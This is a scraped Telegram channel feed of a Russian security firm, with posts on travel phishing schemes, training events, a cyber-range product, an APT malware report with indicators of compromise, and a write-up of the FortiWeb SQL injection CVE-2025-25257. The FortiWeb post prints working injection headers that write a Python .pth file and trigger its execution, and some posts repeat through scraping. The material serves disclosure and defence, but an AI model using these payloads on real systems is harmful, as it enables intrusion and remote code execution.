🌴 Лето, отпуск и… фишинг
Когда вы расслаблены — активизируются мошенники. Вот 6 популярных схем, на которые можно попасться в поездке.
❗️ Фейковые туры и авиабилеты.
В рекламе «🔥 туры» всё выглядит знакомо. Но это сайт-клон Booking или «Аэрофлота».
Оплата — и всё: ни билетов, ни денег.
❗️ Аренда жилья через поддельные сайты.
Фото квартиры, «влог-тур», заманчивый ценник.
🔗 Ссылка на фальшивый Avito или Циан.
Иногда — вредоносное приложение.
❗️ Telegram-чаты «путешественников».
Чат «Бали 2025» или «Гид по Стамбулу».
Псевдогид просит предоплату или данные паспорта.
Потом исчезает.
❗️ Фейковые Wi-Fi сети.
«WiFi_Free» или «Cafe_WiFi» подключается само.
На экране — форма входа через Telegram.
Отдал код — потерял доступ ко всему.
❗️ Письмо от «авиакомпании».
Письмо, например, от bookingsupportr[.]com:
«Рейс перенесён, вернём деньги».
🔗 Внутри — ссылка на фишинг-сайт.
❗️ «Тревел-карты» с кэшбэком.
Реклама: зарубежная карта для путешествий + 10% кэшбэк.
Просят паспорт и «активационный» платёж.
Деньги уходят, карта — фейк.
Рекомендации
🟠 Пользуйтесь исключительно официальными сервисами.
🟠 Не переходите по подозрительным ссылкам, а также не скачивайте файлы, присланные неизвестными контактами.
🟠 Не переводите беседу из официальных сервисов в посторонние мессенджеры.
🟠 Не сообщайте никому из посторонних коды, полученные через пуш-уведомления или SMS.
🟠 Не отправляйте паспортные данные незнакомцам.
🟠 Скачивайте приложения исключительно из официальных магазинов приложений.
#мониторинг_угроз
Когда вы расслаблены — активизируются мошенники. Вот 6 популярных схем, на которые можно попасться в поездке.
В рекламе «🔥 туры» всё выглядит знакомо. Но это сайт-клон Booking или «Аэрофлота».
Оплата — и всё: ни билетов, ни денег.
Фото квартиры, «влог-тур», заманчивый ценник.
Иногда — вредоносное приложение.
Чат «Бали 2025» или «Гид по Стамбулу».
Псевдогид просит предоплату или данные паспорта.
Потом исчезает.
«WiFi_Free» или «Cafe_WiFi» подключается само.
На экране — форма входа через Telegram.
Отдал код — потерял доступ ко всему.
Письмо, например, от bookingsupportr[.]com:
«Рейс перенесён, вернём деньги».
Реклама: зарубежная карта для путешествий + 10% кэшбэк.
Просят паспорт и «активационный» платёж.
Деньги уходят, карта — фейк.
Рекомендации
#мониторинг_угроз
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👏7
ПМ провёл мастер-класс по GEOINT в ГУАП
📆 С 7 по 21 июля в Санкт-Петербургском государственном университете аэрокосмического приборостроения проходит летняя школа «Криптография и информационная безопасность». Мероприятие, организованное Криптографическим центром (Новосибирск) и Международным математическим центром в Академгородке, собрало более 200 участников из 35 городов России — от школьников до преподавателей вузов.
В рамках школы специалисты🐶 «Перспективного мониторинга» Анна Хромова, Владислав Демехин и Артур Слепнев провели мастер-класс по методам геопространственной разведки (GEOINT).
Участники познакомились с методами сбора, анализа и интерпретации геопространственных данных, включая использование картографических ресурсов, геоинформационных систем (ГИС), а также информации из открытых источников — таких как изображения с геометками в социальных сетях.
В рамках школы специалисты
Участники познакомились с методами сбора, анализа и интерпретации геопространственных данных, включая использование картографических ресурсов, геоинформационных систем (ГИС), а также информации из открытых источников — таких как изображения с геометками в социальных сетях.
«Пространственные данные — это не только карты и спутниковые снимки. Это любые данные, связанные с географическим положением. GEOINT позволяет на их основе получить целостную картину происходящего», — отметил Артур Слепнев.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤8👍7👏1
Ampire 1.8: дашборд доступных ресурсов, сохранение прогресса в Ampire Junior и копирование тренировки
Новая версия Ampire содержит важные изменения, упрощающие решение ежедневных задач, а также три новых уязвимых узла.
🥇 Для преподавателей теперь доступна новая страница — «Ресурсы сервера». Она позволяет спрогнозировать, сколько тренировок по конкретному шаблону на текущий момент можно создать с учётом загруженности сервера.
🥇 Добавлена новая функция — копирование тренировки. Она позволяет создать тренировку с такими же параметрами, как у предыдущих, и не вводить все параметры вручную.
🥇 В новой версии Ampire добавлены три новых уязвимых узла: уязвимости в системе мониторинга IT-инфраструктуры, кроссплатформенной системе сборки сервера и системе массового управления учетными записями пользователей.
🥇 В Ampire Junior теперь весь пользовательский прогресс автоматически сохраняется, даже если пользователь случайно закрыл вкладку или заполнил форму с ошибками. Преподаватель, в свою очередь, может в режиме онлайн наблюдать прогресс участника и видеть его ответы на задания.
🔗 Подробнее об обновлении читайте на сайте
Новая версия Ampire содержит важные изменения, упрощающие решение ежедневных задач, а также три новых уязвимых узла.
Please open Telegram to view this post
VIEW IN TELEGRAM
VK
Перспективный мониторинг on VK Clips
Киберучения с полным погружением. Это совместный проект
Киберинтенсив от ПМ и Кибердома представлен на конференции Marketing Stars
Infotecs Marketing Stars — это конференция для специалистов по маркетингу и рекламе в сфере информационных технологий и информационной безопасности. Конференция открыта для каждого маркетингового специалиста из ИТ- и ИБ-сферы. В 2025 году мероприятие посетили более 500 человек.
Анна Рягузова, руководитель направления маркетинга ПМ, и Дмитрий Ленский, программный директор Кибердома, презентовали совместный проект — Киберинтенсив.
Участники Киберинтенсива отрабатывают навыки реагирования на инциденты информационной безопасности, технические скиллы, командное взаимодействие, изучают техники и тактики злоумышленников.
Тренировки Киберинтенсива проходят офлайн на фиджитал-полигоне в Кибердоме. Он подключен к облачной платформе Ampire, откуда происходит удалённое управление всеми техническими системами фиджитал-полигона.
Infotecs Marketing Stars — это конференция для специалистов по маркетингу и рекламе в сфере информационных технологий и информационной безопасности. Конференция открыта для каждого маркетингового специалиста из ИТ- и ИБ-сферы. В 2025 году мероприятие посетили более 500 человек.
Анна Рягузова, руководитель направления маркетинга ПМ, и Дмитрий Ленский, программный директор Кибердома, презентовали совместный проект — Киберинтенсив.
«Киберинтенсив — это результат синергии двух крупных технологических продуктов — учебно-тренировочной платформы Ampire, которая предназначена для подготовки ИБ-специалистов, и удивительное иммерсивное пространство фиджитал-полигона Кибердома с физическими макетами ключевых отраслевых инфраструктур, которые присущи каждому большому государству.
Киберинденсив был разработан нашими ведущими преподавателями „Перспективного мониторинга“, у них за плечами очень серьёзный опыт проведения киберучений — это сотни киберучений для тысяч специалистов», — Анна Рягузова.
Участники Киберинтенсива отрабатывают навыки реагирования на инциденты информационной безопасности, технические скиллы, командное взаимодействие, изучают техники и тактики злоумышленников.
Тренировки Киберинтенсива проходят офлайн на фиджитал-полигоне в Кибердоме. Он подключен к облачной платформе Ampire, откуда происходит удалённое управление всеми техническими системами фиджитал-полигона.
❤8🎉4🥰2
Forwarded from ИнфоТеКС
Компания «ИнфоТеКС» напоминает о базовых правилах кибербезопасности и необходимости проверять источники получения информации, содержащие упоминание ИнфоТеКС и ViPNet. Следует обращать внимание на адреса отправителей писем и ссылки в email-рассылках, а также на IP-адреса отправителей.
Письма от сотрудников АО «ИнфоТеКС», в том числе маркетинговые рассылки,приходят с домена infotecs.ru.
Со списком официальных ресурсов ГК «ИнфоТеКС» можно ознакомиться здесь и здесь.
Проверить ссылки, содержащиеся в письмах, и адреса веб-ресурсов можно с помощью открытого сервиса AMTIP от «Перспективного мониторинга» по ссылке.
Подробнее о вредоносных доменах
Письма от сотрудников АО «ИнфоТеКС», в том числе маркетинговые рассылки,приходят с домена infotecs.ru.
Со списком официальных ресурсов ГК «ИнфоТеКС» можно ознакомиться здесь и здесь.
Проверить ссылки, содержащиеся в письмах, и адреса веб-ресурсов можно с помощью открытого сервиса AMTIP от «Перспективного мониторинга» по ссылке.
Подробнее о вредоносных доменах
👍5
Уязвимость SQL-инъекции в Fortinet FortiWeb (CVE-2025-25257)
Эксплуатация уязвимостей в средствах защиты информации (T1190) является популярным способом получения доступа к системе. Обращаясь к OWASP TOP-10 2021, инъекции кода занимают 3 место в общем списке. В частности, SQL-инъекции остаются одним из самых простых и эффективных способов выполнения произвольного кода.
Попытки реализации подобных атак позволяют:
Коротко о продукте:
FortiWeb – межсетевой экран уровня веб-приложений, предназначенный для защиты от эксплуатации уязвимостей.
Описание уязвимости:
CVE-2025-25257 оценена в 9.8 баллов из 10 по шкале CVSSv3.1. Высокая критичность вызвана низкими требованиями для эксплуатации и значительной результативностью – от первоначального воздействия на базу данных до получения полного контроля над системой. Участие пользователя устройства или аутентификационные данные при этом не нужны.
Описание механизма эксплуатации уязвимости:
Fabric Connector, отвечающий за обмен информацией между FortiWeb и другими решениями экосистемы Fortinet. Функция fabric_access_check считывает значение токена аутентифицикации из HTTP-заголовка «Authorization», имеющего вид: Authorization: Bearer user_tokenuser_token используется в функции get_fabric_user_by_token для выполнения SQL-запроса:select id from fabric_user.user_table where token='user_token'
/api/fabric/device/status
/api/v[0-9]/fabric/widget/[a-z]+
/api/v[0-9]/fabric/widget
user_token до первого пробела. Вместо пробелов следует использовать конструкцию /**/. Кроме того, длина user_token ограничена 128 символами.Пример эксплуатации:
С помощью последовательности HTTP-запросов злоумышленник может добавить в существующую таблицу программный код инструмента, затем объединить фрагменты в один файл и осуществить его запуск. Доставка кода инструмента реализуется несколькими запросами с заголовками, содержащими полезную нагрузку. Например:
Authorization: Bearer '/**/;UPDATE/**/fabric_user.user_table/**/SET/**/token=UNHEX('696d706f72');SELECT/**/'1'
Authorization: Bearer '/**/;UPDATE/**/fabric_user.user_table/**/SET/**/token=CONCAT(token,UNHEX('74206f733b'));SELECT/**/'1'Для извлечения кода инструмента из столбца таблицы и записи в отдельный файл применяется заголовок:
Authorization: Bearer '/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth
Для запуска загруженного инструмента используется запрос к конечному адресу:
/cgi-bin/ml-draw.py
#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18❤8👍4🤩2👏1
Специалисты направления исследования киберугроз ПМ зафиксировали новые модификации ВПО, связанные с APT-группировкой Core Werewolf
😀 😀 😀 😀
Атаки Core Werewolf, также известных как Awaken Likho и PseudoGamaredon, направлены на органы государственной власти, а также российские организации, связанные с оборонной промышленностью и критически важной информационной инфраструктурой.
❗️ Вектор атаки:
Обнаруженный вектор атаки схож с предыдущими кампаниями данной группировки. Так, в процессе получения первоначального доступа злоумышленники использовали вредоносное вложение в формате RAR-архива «
При запуске исполняемого файла выполняется распаковка во временную директорию следующих файлов:
🟠 decoy-файл «
🟠 исполняемый файл с функционалом WinRAR
🟠 RAR-архив
🟠 CMD-файл
После запуска
Далее
На данном этапе через
Кроме этого,
Финальным этапом вредоносной активности является взаимодействие зараженного хоста с С2-сервером злоумышленника через ранее запущенный образец
❗️ Индикаторы компрометации:
IP:
Domains:
SHA256:
❗️ В базах решающих правил AM Rules ПМ присутствуют детектирующие правила, позволяющие обнаружить не только конкретную описанную угрозу, но и предотвратить аналогичную активность злоумышленника в дальнейшем. Проверить собственные индикаторы компрометации на вредоносность можно с помощью AM TIP
#AM_Rules
Атаки Core Werewolf, также известных как Awaken Likho и PseudoGamaredon, направлены на органы государственной власти, а также российские организации, связанные с оборонной промышленностью и критически важной информационной инфраструктурой.
Обнаруженный вектор атаки схож с предыдущими кампаниями данной группировки. Так, в процессе получения первоначального доступа злоумышленники использовали вредоносное вложение в формате RAR-архива «
Методические рекомендации по ведению воинского учета в организациях.rar», внутри которого находился вредоносный файл-дроппер с таким же наименованием «Методические рекомендации по ведению воинского учета в организациях.exe». При запуске исполняемого файла выполняется распаковка во временную директорию следующих файлов:
Методические рекомендации по ведению воинского учета в организациях.pdf» (скриншот 1)selfterminating.exelipspreading.rargreenyellow.cmdПосле запуска
greenyellow.cmd, а также PDF-файла, с помощью вышеупомянутого selfterminating.exe выполняется распаковка lipspreading.rar, который содержит bat-файлы Syrohittite.bat и creativities.bat, а также исполняемый файл PnPHost.exe с функционалом UltraVNC (скриншот 2)Далее
greenyellow.cmd передает управление одному из bat-файлов %ComSpec% /c C:\Users\Public\Documents\Syrohittite.batНа данном этапе через
Syrohittite.bat в скрытом режиме запускается creativities.bat, а также создаются конфигурационные файлы morish.ini и ultravnc.ini (скриншот 3)Кроме этого,
Syrohittite.bat, используя PowerShell-команды, создает запланированную задачу для запуска creativities.bat через conhost.exe (скриншот 4). При этом данная задача выполняется каждые 6 минут с повторным стартом в течение каждого нового дня после создания. Функционалом creativities.bat является проверка доступности C2-сервера deshevorus[.]ru, а также запуск PnPHost.exe. Стоит заметить, что запуск выполнялся несколько раз, в одном из которых присутствовали опции автоматического восстановления соединение с С2 (скриншот 5)Финальным этапом вредоносной активности является взаимодействие зараженного хоста с С2-сервером злоумышленника через ранее запущенный образец
UltraVNCIP:
95.81.115[.]225
Domains:
deshevorus[.]ru
SHA256:
f802f04b9d835060bebfdacf235b219163c32321837a2d78f60ea20a2d816f29 (Методические рекомендации по ведению воинского учета в организациях.exe)
636b06d74f2622096fe0596a8bae3785f1fc425ed0e4ec74369b3a018e26dc55 (greenyellow.cmd)
5d779fe05087e40f3c1d3f6734acf912516bca02568565194fb09dfe6604e98e (creativities.bat)
5c9dbcc95baafa3e7e1806f2ec6e5ce8f6bff336e583bfac814d1bca60e36fcb (Syrohittite.bat)
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24 (PnPHost.exe)
602916f65d920ebef3f5d7bc8e1076e4848f3235242cd968f0659ff97daf0e8e (Методические рекомендации по ведению воинского учета в организациях.exe)
575ab600f7410362b91da0816e1190b6b0a42127fab796fccedee4fb318b291b (lipspreading.rar)
#AM_Rules
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤8🤩5
Кража NFT-подарков в Telegram: механизмы, инструменты и рекомендации по защите
Последние обновления в мессенджере Telegram расширили пользовательские возможности, которые открыли новые двери для злоумышленников.
В приложении мессенджера появились новый функционал — открытый рынок подарков в Telegram, и на этом фоне тема NFT стала вновь популярна.
Сегодня разберемся с трендом на NFT-подарки: их довольно сложно получить из-за конкуренции с ботами, а потерять — проще простого.
Мы расскажем и покажем:
🟠 как мошенники могут забрать все NFT, даже без участия жертвы;
🟠 как они находят пользователей для осуществления схемы;
🟠 какие инструменты используют;
🟠 как уберечь свои уникальные цифровые продукты.
Читайте статью Артура Слепнева, старшего аналитика данных ПМ.
🔗 Читать статью
Последние обновления в мессенджере Telegram расширили пользовательские возможности, которые открыли новые двери для злоумышленников.
В приложении мессенджера появились новый функционал — открытый рынок подарков в Telegram, и на этом фоне тема NFT стала вновь популярна.
Сегодня разберемся с трендом на NFT-подарки: их довольно сложно получить из-за конкуренции с ботами, а потерять — проще простого.
Мы расскажем и покажем:
Читайте статью Артура Слепнева, старшего аналитика данных ПМ.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤10👏7
Ampire — лучшее автоматизированное решение управления рисками
Такой статус киберполигон Ampire получил в 2024 году по результатам ежегодного конкурса «Лучший риск-менеджмент в России», который проводит Ассоциация риск-менеджмента «Русское общество управления рисками» (РусРиск). За год киберполигон обновился с версии 1.4 до 1.7, значительно расширив возможности применения в образовательной сфере.
🥇 Сегодня в вузах работают 11 брендированных лабораторий Ampire.
🥇 Киберполигоном постоянно пользуются для образования, повышения квалификации и практических занятий 34 организации.
🥇 Всего проведено более 550 киберучений, в которых в целом приняли участие более 5 000 специалистов и студентов.
Такой статус киберполигон Ampire получил в 2024 году по результатам ежегодного конкурса «Лучший риск-менеджмент в России», который проводит Ассоциация риск-менеджмента «Русское общество управления рисками» (РусРиск). За год киберполигон обновился с версии 1.4 до 1.7, значительно расширив возможности применения в образовательной сфере.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3❤1